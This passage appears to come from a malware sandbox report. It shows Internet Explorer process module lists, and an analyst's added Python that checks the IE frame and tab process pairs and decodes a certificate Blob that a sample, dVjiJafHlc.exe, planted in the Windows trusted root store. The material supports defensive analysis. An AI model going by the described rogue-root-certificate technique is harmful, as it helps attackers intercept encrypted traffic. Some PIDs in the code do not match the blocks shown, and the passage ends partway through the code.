c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

PID
2488
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
1892
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2488 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll

PID
652
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\sxs.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\mlang.dll
c:\windows\system32\linkinfo.dll

PID
1904
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:652 CREDAT:267521 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll
c:\windows\syswow64\p2pcollab.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\windowscodecs.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
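
The eight Internet Explorer processes above come in four identical pairs: a 64-bit iexplore.exe started with -Embedding at MEDIUM integrity and no parent shown, and a 32-bit IEXPLORE.EXE child at LOW integrity whose command line names the first one with SCODEF:<pid>. That is IE 11's normal split on 64-bit Windows 7: the frame process is the broker, the tab process renders content (it is the one loading mshtml.dll, jscript9.dll and schannel.dll in the module lists) and runs in Protected Mode at low integrity; -Embedding is the switch a COM local server receives when it is activated out of process rather than started by a user, for example when a script instantiates InternetExplorer.Application. The check below is an added example written for this page, not ANY.RUN's code and not part of the report: the process tuples are copied from the blocks above, while the rule set (a tab must be LOW, its SCODEF must name a frame in the list, its parent must be the frame) and the anomalous ninth record used to exercise it are mine.

```python
r"""Cross-check the Internet Explorer frame/tab process pairs listed above.

IE 11 on 64-bit Windows 7 runs a 64-bit frame (broker) process and, with Protected
Mode on, 32-bit tab (content) processes at LOW integrity whose command line carries
SCODEF:<frame pid>. A frame started with -Embedding was activated as a COM local
server (for example by a script calling CreateObject("InternetExplorer.Application"))
rather than launched by a user."""
import re

# Constructed from the eight process blocks above: (pid, command line, parent, integrity).
REPORT_PROCESSES = [
    (2728, r'"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding', None, "MEDIUM"),
    (2800, r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2728 CREDAT:267521 /prefetch:2', "iexplore.exe", "LOW"),
    (908, r'"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding', None, "MEDIUM"),
    (2752, r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"  SCODEF:908 CREDAT:267521 /prefetch:2', "iexplore.exe", "LOW"),
    (2488, r'"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding', None, "MEDIUM"),
    (1892, r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2488 CREDAT:267521 /prefetch:2', "iexplore.exe", "LOW"),
    (652, r'"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding', None, "MEDIUM"),
    (1904, r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:652 CREDAT:267521 /prefetch:2', "iexplore.exe", "LOW"),
]

SCODEF = re.compile(r"\bSCODEF:(\d+)")


def is_iexplore(cmdline):
    """True when the quoted image path at the start of the command line is iexplore.exe."""
    return cmdline.lower().lstrip('"').split('"')[0].endswith("\\iexplore.exe")


def check_ie_processes(processes):
    """Pair every tab with its frame and flag what does not fit the Protected Mode model.
    Returns {"pairs": {tab_pid: frame_pid}, "com_activated": [frame pids], "anomalies": [str]}."""
    ie = [p for p in processes if is_iexplore(p[1])]
    frames = {pid for pid, cmd, _parent, _integ in ie if not SCODEF.search(cmd)}
    out = {"pairs": {}, "com_activated": [], "anomalies": []}
    for pid, cmd, parent, integrity in ie:
        m = SCODEF.search(cmd)
        if m is None:                                              # frame (broker) process
            if integrity != "MEDIUM":
                out["anomalies"].append(f"frame {pid} runs at {integrity}, expected MEDIUM")
            if "-embedding" in cmd.lower():
                out["com_activated"].append(pid)
            continue
        frame = int(m.group(1))                                    # tab (content) process
        out["pairs"][pid] = frame
        if frame not in frames:
            out["anomalies"].append(f"tab {pid} names frame {frame}, which is not an IE frame in this list")
        if integrity != "LOW":
            out["anomalies"].append(f"tab {pid} runs at {integrity}, expected LOW (Protected Mode)")
        if parent != "iexplore.exe":
            out["anomalies"].append(f"tab {pid} has parent {parent!r}, expected its frame iexplore.exe")
    return out


REPORT_CHECK = check_ie_processes(REPORT_PROCESSES)   # pairs 2800->2728, 2752->908, 1892->2488, 1904->652
```

For the report's eight processes the result has four tab/frame pairs, four COM-activated frames and no anomalies; the same function run on a tab at MEDIUM whose SCODEF names a PID that is not a frame, or whose parent is not iexplore.exe, returns one anomaly per broken rule. A tab outside LOW integrity is the case worth alerting on, since it means either Protected Mode is disabled or something other than the frame created a process that merely looks like a tab.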

Registry activity

Total events
2933
Read events
2617
Write events
315
Delete events
1
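
The modification events listed below fall into three groups. The WinRAR.exe rows are UI state (column widths, window placement, toolbar layout, archive history, last folder) plus a MuiCache entry that resolves string 4802 of wshext.dll to "VBScript Script File", which is what gets cached when the archive listing shows a file of that type. The ZoneMap values written by WScript.exe and powershell.exe (ProxyBypass, IntranetName, UNCAsIntranet, AutoDetect) are typically the defaults WinINet writes when a process first initialises its Internet settings, so on their own they say only that the script host and PowerShell used WinINet/URLMon networking. The row that deserves real attention is the last one: dVjiJafHlc.exe (PID 1628) deletes and re-creates HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70, an entry in the machine-wide trusted root store, and writes a Blob value to it. That Blob is a serialised CryptoAPI certificate context: a sequence of records of the form DWORD property id, DWORD reserved (1), DWORD length, data, in which property 0x20 (CERT_CERT_PROP_ID) is the DER certificate and property 0x03 (CERT_SHA1_HASH_PROP_ID) its thumbprint. The decoder below is an added example written for this page, not ANY.RUN's code and not part of the report; it embeds the Blob exactly as the report prints it, which is cut off inside the RSA signature, so the parser is written to cope with a truncated DER and falls back on the stored SHA-1 property when the whole certificate is not available to hash. The registry key name and the Blob are the report's; the field names and checks are mine.

```python
r"""Decode a CryptoAPI certificate Blob such as the one dVjiJafHlc.exe wrote under
HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<SHA-1>\Blob. Layout: records of
DWORD propid | DWORD reserved (1) | DWORD length | data[length]; 0x20 = DER cert, 0x03 = SHA-1."""
import datetime, hashlib, struct

# Blob value exactly as printed in the report (cut off inside the RSA signature); the thumbprint is the key name.
BLOB_HEX = (
    "0400000001000000100000001BAA5A0ECD1ED4B64DFBF621DC9044BF0F000000010000002000000061905BC048345D3815587E318FEAAE705D07527F3B5BD1B2A6AF514E29BA4652"
    "5C000000010000000400000000080000030000000100000014000000E02357FC7708441D4B0BE5F371F4B28961870F70"
    "140000000100000014000000ECCD4BA46722CB4F92060701865DDF09D8AF68B41900000001000000100000000FB5FACA274B0EA933E42C34A45C2D56"
    "20000000010000006A030000308203663082024EA003020102020900EE1E7E5DC92BCE32300D06092A864886F70D01010B0500"
    "3048310B30090603550406130241553113301106035504080C0A536F6D652D5374617465310D300B06035504070C044369747931153013060355040A0C0C536F6D6520436F6D70616E79"
    "301E170D3137303932393132323035305A170D3230303932383132323035305A3048310B30090603550406130241553113301106035504080C0A536F6D652D5374617465310D300B"
    "06035504070C044369747931153013060355040A0C0C536F6D6520436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100"
    "C213E403EA7099364CC3D32AE10D85F8364F3874F86A14DAD9972751C9F548F6025F083F3F8BE947523744A631B6E409CF2CEFBC28F5C9F16ACD3C88ABE7BA7A"
    "5871A1CBF3562F7A576C3E9FAED296B5B9867651DB238499683B4E9D768FDA49C5BCA2A9928AFAF2EAD01F1FBE679E6D8ECC7BA57BB55DFA44C03A14BF11D36C"
    "7F9D654AC6B76DF9E8D83E1D238A1BCFAA22BADF071A9300CBDCC71C58846BD4ECB7F2BA7BBEF630C61B4FB01BC67E022BE89E243B0EF7F6ABBAC502A48E1DE6"
    "5787B538F842E83652C365E26F2D47BFA5132215B96E2725AC3FD496BAE376D778A2C3C35D0382B89F61961BF6BA08DB4A892B4BCE3FA96FF3990C6066F1E1FF"
    "0203010001A3533051301D0603551D0E04160414ECCD4BA46722CB4F92060701865DDF09D8AF68B4301F0603551D23041830168014ECCD4BA46722CB4F92060701865DDF09D8AF68B4300F0603551D13"
    "0101FF040530030101FF300D06092A864886F70D01010B0500038201010095A081FEE7794AAE6A222E01AD459EB4288CA6DCD8E1A4F5EDF609C4ACB16E19F51B543E8C75E6B833556E22641E3619EE31"
    "F26A7F5477CA8AB8F7417BFDAE076DD329D01C490D1551313F6BA132F46CAFB608C0378CBB1F1C019C573824F7758EAB50AACBE52E4D7B2EC5BD50B555CF4EC9A29892E262ED148EEC6C07F8BDD9D3BE"
    "CE8402498A490A20A7F518A918065213AE11EBAC77BD1504B4E60EB2C928DA2ACE10A2B7BB7398D229D3EC6A1C2C2BE2E9C5B10C62E4012057E62598"
)
REGISTRY_KEY_THUMBPRINT = "E02357FC7708441D4B0BE5F371F4B28961870F70"
OID_SHORT = {b"\x55\x04\x06": "C", b"\x55\x04\x08": "ST", b"\x55\x04\x07": "L", b"\x55\x04\x0a": "O", b"\x55\x04\x0b": "OU", b"\x55\x04\x03": "CN"}


def parse_blob(blob):
    """{propid: data}, plus {propid: declared_length} for any record the input cuts short."""
    props, truncated, pos = {}, {}, 0
    while pos + 12 <= len(blob):
        propid, _reserved, length = struct.unpack_from("<III", blob, pos)
        props[propid] = blob[pos + 12:pos + 12 + length]
        if len(props[propid]) < length:
            truncated[propid] = length
        pos += 12 + length
    return props, truncated


def tlv(buf, pos):
    """One DER TLV -> (tag, value_start, value_end, next_pos); value_end is clamped to the buffer."""
    tag, first = buf[pos], buf[pos + 1]
    n = first & 0x7F if first & 0x80 else 0            # long form: low 7 bits = number of length bytes
    length, start = (int.from_bytes(buf[pos + 2:pos + 2 + n], "big") if n else first), pos + 2 + n
    return tag, start, min(start + length, len(buf)), start + length


def children(buf, start, end):
    """Yield (tag, value_start, value_end) for each TLV directly inside buf[start:end]."""
    pos = start
    while pos < end:
        tag, s, e, pos = tlv(buf, pos)
        yield tag, s, e


def name_to_str(buf, start, end):
    """X.501 Name (SEQUENCE OF SET OF AttributeTypeAndValue) -> 'C=AU, ST=..., O=...'."""
    parts = []
    for _set, s1, e1 in children(buf, start, end):
        for _seq, s2, e2 in children(buf, s1, e1):
            (_t, os_, oe), (_v, vs, ve) = list(children(buf, s2, e2))[:2]
            parts.append(f"{OID_SHORT.get(buf[os_:oe], buf[os_:oe].hex())}={buf[vs:ve].decode()}")
    return ", ".join(parts)


def parse_certificate(der):
    """Analyst-relevant tbsCertificate fields; tolerates a truncated DER as long as the TBS is intact."""
    _, cs, _ce, cert_end = tlv(der, 0)                 # Certificate ::= SEQUENCE { tbs, sigAlg, sig }
    _, ts, te, _ = tlv(der, cs)                        # tbsCertificate
    f = list(children(der, ts, te))
    i = 1 if f[0][0] == 0xA0 else 0                    # skip [0] EXPLICIT version when present
    def asn1_time(tag, s, e):                          # UTCTime (YY...) or GeneralizedTime (YYYY...)
        fmt = "%Y%m%d%H%M%SZ" if tag == 0x18 else "%y%m%d%H%M%SZ"
        return datetime.datetime.strptime(der[s:e].decode(), fmt).replace(tzinfo=datetime.timezone.utc)
    issuer, subject = name_to_str(der, *f[i + 2][1:]), name_to_str(der, *f[i + 4][1:])
    not_before, not_after = (asn1_time(*c) for c in children(der, *f[i + 3][1:]))
    is_ca = False
    for tag, s, _e in f[i + 6:]:                       # after SPKI: optional uniqueIDs, [3] extensions
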